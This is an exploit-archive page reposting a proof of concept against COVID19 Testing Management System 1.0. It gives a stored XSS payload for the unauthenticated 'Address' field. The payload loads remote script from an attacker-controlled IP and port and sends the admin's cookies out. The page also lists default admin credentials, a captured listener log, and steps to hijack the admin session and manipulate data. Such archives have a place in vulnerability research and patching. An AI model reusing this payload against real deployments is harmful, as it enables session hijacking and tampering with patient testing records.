Advertisement






COVID19 Testing Management System 1.0 - Remote Code Execution (RCE) through Stored Cross-Site-Script

CVE Category Price Severity
N/A CWE-79 Varies Critical
Author Risk Exploitation Type Date
ExploitAlert Team High Remote 2021-06-14
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060084

Below is a copy:

COVID19 Testing Management System 1.0 - Remote Code Execution (RCE) through Stored Cross-Site-Scripting (XSS)
# Exploit Title: COVID19 Testing Management System 1.0 - Remote Code Execution (RCE) through Stored Cross-Site-Scripting (XSS)
# Date: 11 June 2021
# Exploit Author: BHAVESH KAUL
# Author Linkedin: https://www.linkedin.com/in/bhavesh-kaul-cs/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP

# Description #

COVID19 Testing Management System 1.0 is vulnerable to Remote Code Execution (RCE) through Stored Cross-Site-Scripting (XSS) because of insufficient user supplied data sanitization and the payload being executed in the administration panel successfully. Anyone can submit a stored XSS payload without login when registering a new user. This makes the application store our payload in the database and it is fired when the administrator views the new user details, making us load our crafted javascript reverse shell and allowing us to execute code and do other exploitation easily.

# Proof of Concept (PoC) : Exploit #

1) Goto: http://localhost/covid-tms/new-user-testing.php

2) Enter the following payload in 'Address' parameter: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//OUR_IP:OUR_PORT/?"+document.cookie},1010)</script>

3) Fill out other information and submit query

4) Now login as administrator: Test Credentials = admin | Test@123

5) Goto: http://localhost/covid-tms/new-test.php

6) Click on 'View Details' for your recently added entry

7) Our XSS payload is fired and We got a reverse shell session in our terminal:

[~] Waiting for the payload to be executed
listening on [any] 33 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.15] 49872

GET / HTTP/1.1
Host: Redacted-IP:Redacted-Port
User-Agent: -redacted-
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
DNT: 1
Connection: keep-alive

[+] Victim is online. Enter JS code to execute.

8) Now we execute the javascript commands to get the document cookie (auth session cookie) and perform other actions such as infect all the links on the webpage and perform unauthenticated data manipulation.


# Reference Image #

1) Vulnerable Parameter: https://ibb.co/s5t0Xhr
2) XSS Payload Fired & Reverse Shell Established: https://ibb.co/NyW3j3F
3) Reverse-Shell Payload Fired: https://ibb.co/P1R9ShW

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum